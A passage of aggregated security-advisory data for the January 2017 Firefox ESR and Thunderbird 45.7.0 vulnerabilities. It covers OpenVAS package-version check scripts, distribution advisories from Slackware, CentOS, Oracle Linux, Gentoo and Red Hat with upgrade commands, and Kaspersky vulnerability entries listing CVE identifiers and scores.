rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-rm\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ro\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ru\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-si\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-sk\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-sl\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-son\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-sq\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-sr\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-sv-se\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ta\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-te\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-th\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-tr\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-uk\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-uz\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-vi\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-xh\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-cn\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-tw\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-29T18:34:21", "bulletinFamily": "scanner", "description": "Check the version of thunderbird", "modified": "2019-03-08T00:00:00", "published": "2017-02-03T00:00:00", "id": "OPENVAS:1361412562310882650", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882650", "title": "CentOS Update for thunderbird CESA-2017:0238 centos7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for thunderbird CESA-2017:0238 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882650\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-02-03 05:47:46 +0100 (Fri, 03 Feb 2017)\");\n script_cve_id(\"CVE-2017-5373\", \"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\",\n \"CVE-2017-5380\", \"CVE-2017-5383\", \"CVE-2017-5390\", \"CVE-2017-5396\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for thunderbird CESA-2017:0238 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of thunderbird\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Thunderbird is a standalone mail and\nnewsgroup client.\n\nThis update upgrades Thunderbird to version 45.7.0.\n\nSecurity Fix(es):\n\n * Multiple flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Thunderbird to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nThunderbird. (CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378,\nCVE-2017-5380, CVE-2017-5383, CVE-2017-5390, CVE-2017-5396)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Jann Horn, Filipe Gomes, Nils, Armin Razmjou,\nChristian Holler, Gary Kwong, Andre Bargull, Jan de Mooij, Tom Schuster,\nOriol, Rh0, Nicolas Gregoire, and Jerri Rice as the original reporters.\");\n script_tag(name:\"affected\", value:\"thunderbird on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:0238\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-February/022264.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~45.7.0~1.el7.centos\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:18", "bulletinFamily": "scanner", "description": "Check the version of thunderbird", "modified": "2019-03-08T00:00:00", "published": "2017-02-03T00:00:00", "id": "OPENVAS:1361412562310882649", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882649", "title": "CentOS Update for thunderbird CESA-2017:0238 centos6", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for thunderbird CESA-2017:0238 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882649\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-02-03 05:47:36 +0100 (Fri, 03 Feb 2017)\");\n script_cve_id(\"CVE-2017-5373\", \"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\",\n \"CVE-2017-5380\", \"CVE-2017-5383\", \"CVE-2017-5390\", \"CVE-2017-5396\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for thunderbird CESA-2017:0238 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of thunderbird\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Thunderbird is a standalone mail\nand newsgroup client.\n\nThis update upgrades Thunderbird to version 45.7.0.\n\nSecurity Fix(es):\n\n * Multiple flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Thunderbird to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nThunderbird. (CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378,\nCVE-2017-5380, CVE-2017-5383, CVE-2017-5390, CVE-2017-5396)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Jann Horn, Filipe Gomes, Nils, Armin Razmjou,\nChristian Holler, Gary Kwong, Andre Bargull, Jan de Mooij, Tom Schuster,\nOriol, Rh0, Nicolas Gregoire, and Jerri Rice as the original reporters.\");\n script_tag(name:\"affected\", value:\"thunderbird on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:0238\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-February/022262.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~45.7.0~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2019-05-30T07:37:28", "bulletinFamily": "unix", "description": "New mozilla-thunderbird packages are available for Slackware 14.1, 14.2,\nand -current to fix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/mozilla-thunderbird-45.7.0-i586-1_slack14.2.txz: Upgraded.\n This release contains security fixes and improvements.\n For more information, see:\n https://www.mozilla.org/security/known-vulnerabilities/thunderbird.html\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5375\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5376\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5378\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5380\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5390\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5396\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5383\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5386\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5373\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/mozilla-thunderbird-45.7.0-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/mozilla-thunderbird-45.7.0-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/mozilla-thunderbird-45.7.0-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/mozilla-thunderbird-45.7.0-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-45.7.0-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-45.7.0-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.1 package:\nb944bea9c98775dc812beb3151933382 mozilla-thunderbird-45.7.0-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n71f006a9aed72154ba8d49e2e30d05b0 mozilla-thunderbird-45.7.0-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\nb0b51e73c2d9f489609b66a8719baac2 mozilla-thunderbird-45.7.0-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n8c764b5f61595020e3cd5c320c1f9116 mozilla-thunderbird-45.7.0-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n57c3693787752848428469ec69996f58 xap/mozilla-thunderbird-45.7.0-i586-1.txz\n\nSlackware x86_64 -current package:\n549218c6ad3bc9e9cd5f103072a1b1db xap/mozilla-thunderbird-45.7.0-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg mozilla-thunderbird-45.7.0-i586-1_slack14.2.txz", "modified": "2017-01-26T20:35:28", "published": "2017-01-26T20:35:28", "id": "SSA-2017-026-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.448861", "title": "mozilla-thunderbird", "type": "slackware", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-05-29T18:33:18", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2017:0190\n\n\nMozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.7.0 ESR.\n\nSecurity Fix(es):\n\n* Multiple flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or, potentially,\nexecute arbitrary code with the privileges of the user running Firefox.\n(CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378, CVE-2017-5380,\nCVE-2017-5383, CVE-2017-5386, CVE-2017-5390, CVE-2017-5396)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Jann Horn, Filipe Gomes, Muneaki Nishimura, Nils, Armin\nRazmjou, Christian Holler, Gary Kwong, Andre Bargull, Jan de Mooij, Tom\nSchuster, Oriol, Rh0, Nicolas Gregoire, and Jerri Rice as the original\nreporters.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-February/022276.html\nhttp://lists.centos.org/pipermail/centos-announce/2017-February/022277.html\nhttp://lists.centos.org/pipermail/centos-announce/2017-February/022278.html\nhttp://lists.centos.org/pipermail/centos-announce/2017-January/022251.html\nhttp://lists.centos.org/pipermail/centos-announce/2017-January/022253.html\nhttp://lists.centos.org/pipermail/centos-announce/2017-January/022256.html\n\n**Affected packages:**\nfirefox\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-0190.html", "modified": "2017-02-22T13:44:06", "published": "2017-01-26T20:24:55", "id": "CESA-2017:0190", "href": "http://lists.centos.org/pipermail/centos-announce/2017-January/022256.html", "title": "firefox security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:22", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2017:0238\n\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 45.7.0.\n\nSecurity Fix(es):\n\n* Multiple flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Thunderbird to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nThunderbird. (CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378,\nCVE-2017-5380, CVE-2017-5383, CVE-2017-5390, CVE-2017-5396)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Jann Horn, Filipe Gomes, Nils, Armin Razmjou, Christian\nHoller, Gary Kwong, Andre Bargull, Jan de Mooij, Tom Schuster, Oriol, Rh0,\nNicolas Gregoire, and Jerri Rice as the original reporters.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-February/022262.html\nhttp://lists.centos.org/pipermail/centos-announce/2017-February/022263.html\nhttp://lists.centos.org/pipermail/centos-announce/2017-February/022264.html\n\n**Affected packages:**\nthunderbird\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-0238.html", "modified": "2017-02-02T22:03:28", "published": "2017-02-02T21:10:46", "id": "CESA-2017:0238", "href": "http://lists.centos.org/pipermail/centos-announce/2017-February/022262.html", "title": "thunderbird security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:01", "bulletinFamily": "unix", "description": "[45.7.0-1.0.1]\n- Add firefox-oracle-default-prefs.js and firefox-oracle-default-bookmarks.html\n and remove the corresponding Red Hat files\n[45.7.0-1]\n- Updated to 45.7.0 (B1)\n[45.6.0-2]\n- Enabled ffmpeg > 54.35.1 (rhbz#1330898, mozbz#1263665)", "modified": "2017-01-25T00:00:00", "published": "2017-01-25T00:00:00", "id": "ELSA-2017-0190", "href": "http://linux.oracle.com/errata/ELSA-2017-0190.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:54", "bulletinFamily": "unix", "description": "[45.7.0-1.0.1]\n- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js\n[45.7.0-1]\n- Update to 45.7.0", "modified": "2017-02-02T00:00:00", "published": "2017-02-02T00:00:00", "id": "ELSA-2017-0238", "href": "http://linux.oracle.com/errata/ELSA-2017-0238.html", "title": "thunderbird security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2017-02-21T01:00:00", "bulletinFamily": "unix", "description": "### Background\n\nMozilla Firefox is a popular open-source web browser from the Mozilla Project. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Mozilla Firefox. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, bypass access restriction, access otherwise protected information, or spoof content via multiple vectors. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Mozilla Firefox users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-45.7.0\"\n \n\nAll Mozilla Firefox binary users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-bin-45.7.0\"", "modified": "2017-02-20T00:00:00", "published": "2017-02-20T00:00:00", "id": "GLSA-201702-22", "href": "https://security.gentoo.org/glsa/201702-22", "title": "Mozilla Firefox: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-02-21T01:00:00", "bulletinFamily": "unix", "description": "### Background\n\nMozilla Thunderbird is a popular open-source email client from the Mozilla project. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Mozilla Thunderbird. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker, by enticing a user to open a specially crafted email or web page, could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Mozilla Thunderbird users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-client/thunderbird-45.7.0\"\n \n\nAll Mozilla Thunderbird binary users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=mail-client/thunderbird-bin-45.7.0\"", "modified": "2017-02-20T00:00:00", "published": "2017-02-20T00:00:00", "href": "https://security.gentoo.org/glsa/201702-13", "id": "GLSA-201702-13", "title": "Mozilla Thunderbird: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2019-08-13T18:46:02", "bulletinFamily": "unix", "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 45.7.0.\n\nSecurity Fix(es):\n\n* Multiple flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Thunderbird to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nThunderbird. (CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378,\nCVE-2017-5380, CVE-2017-5383, CVE-2017-5390, CVE-2017-5396)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Jann Horn, Filipe Gomes, Nils, Armin Razmjou, Christian\nHoller, Gary Kwong, Andre Bargull, Jan de Mooij, Tom Schuster, Oriol, Rh0,\nNicolas Gregoire, and Jerri Rice as the original reporters.\n", "modified": "2018-06-06T20:24:34", "published": "2017-02-02T05:00:00", "id": "RHSA-2017:0238", "href": "https://access.redhat.com/errata/RHSA-2017:0238", "type": "redhat", "title": "(RHSA-2017:0238) Important: thunderbird security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2019-03-21T00:14:37", "bulletinFamily": "info", "description": "### *Detect date*:\n01/26/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Mozilla Thunderbird. Malicious users can exploit these vulnerabilities to obtain sensitive information, run arbitrary code, cause a denial of service, spoof user interface and gain privilege escalation.\n\n### *Affected products*:\nMozilla Thunderbird versions earlier than 45.7\n\n### *Solution*:\nUpdate to the latest version \n[Mozilla Thunderbird](<https://www.mozilla.org/en-US/thunderbird/>)\n\n### *Original advisories*:\n[MFSA](<https://www.mozilla.org/en-US/security/advisories/mfsa2017-03/>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Mozilla Thunderbird](<https://threats.kaspersky.com/en/product/Mozilla-Thunderbird/>)\n\n### *CVE-IDS*:\n[CVE-2017-5375](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5375>)9.8Critical \n[CVE-2017-5376](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5376>)9.8Critical \n[CVE-2017-5378](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5378>)7.5Critical \n[CVE-2017-5380](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5380>)9.8Critical \n[CVE-2017-5390](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5390>)9.8Critical \n[CVE-2017-5396](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5396>)9.8Critical \n[CVE-2017-5383](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5383>)5.3Critical \n[CVE-2017-5373](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5373>)9.8Critical", "modified": "2019-03-07T00:00:00", "published": "2017-01-26T00:00:00", "id": "KLA10956", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10956", "title": "\r KLA10956Multiple vulnerabilities in Mozilla Thunderbird ", "type": "kaspersky", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-21T00:14:33", "bulletinFamily": "info", "description": "### *Detect date*:\n01/24/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Mozilla Firefox and Mozilla Firefox ESR. Malicious users can exploit these vulnerabilities to obtain sensitive information, make code injection, run arbitrary code, bypass security restrictions, cause a denial of service.\n\n### *Affected products*:\nMozilla Firefox versions earlier than 51.0 \nMozilla Firefox ESR versions earlier than 45.7.0\n\n### *Solution*:\nUpdate to latest version \n[Mozilla Firefox ESR](<https://www.mozilla.org/en-US/firefox/organizations/all/>) \n[Mozilla Firefox](<https://www.mozilla.org/en-US/firefox/new/>)\n\n### *Original advisories*:\n[MFSA 2017-02](<https://www.mozilla.org/en-US/security/advisories/mfsa2017-02/>) \n[MFSA 2017-01](<https://www.mozilla.org/en-US/security/advisories/mfsa2017-01/#CVE-2017-5383>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Mozilla Firefox](<https://threats.kaspersky.com/en/product/Mozilla-Firefox/>)\n\n### *CVE-IDS*:\n[CVE-2017-5375](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5375>)9.8Critical \n[CVE-2017-5376](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5376>)9.8Critical \n[CVE-2017-5378](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5378>)7.5Critical \n[CVE-2017-5380](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5380>)9.8Critical \n[CVE-2017-5390](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5390>)9.8Critical \n[CVE-2017-5396](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5396>)9.8Critical \n[CVE-2017-5383](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5383>)5.3Critical \n[CVE-2017-5373](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5373>)9.8Critical \n[CVE-2017-5377](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5377>)9.8Critical \n[CVE-2017-5379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5379>)7.5Critical \n[CVE-2017-5389](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5389>)6.1Critical \n[CVE-2017-5381](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5381>)7.5Critical \n[CVE-2017-5382](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5382>)7.5Critical \n[CVE-2017-5384](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5384>)5.9Critical \n[CVE-2017-5385](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5385>)7.5Critical \n[CVE-2017-5386](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5386>)7.3Critical \n[CVE-2017-5394](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5394>)8.8Critical \n[CVE-2017-5391](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5391>)9.8Critical \n[CVE-2017-5392](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5392>)9.8Critical \n[CVE-2017-5393](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5393>)6.1Critical \n[CVE-2017-5395](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5395>)4.3Critical 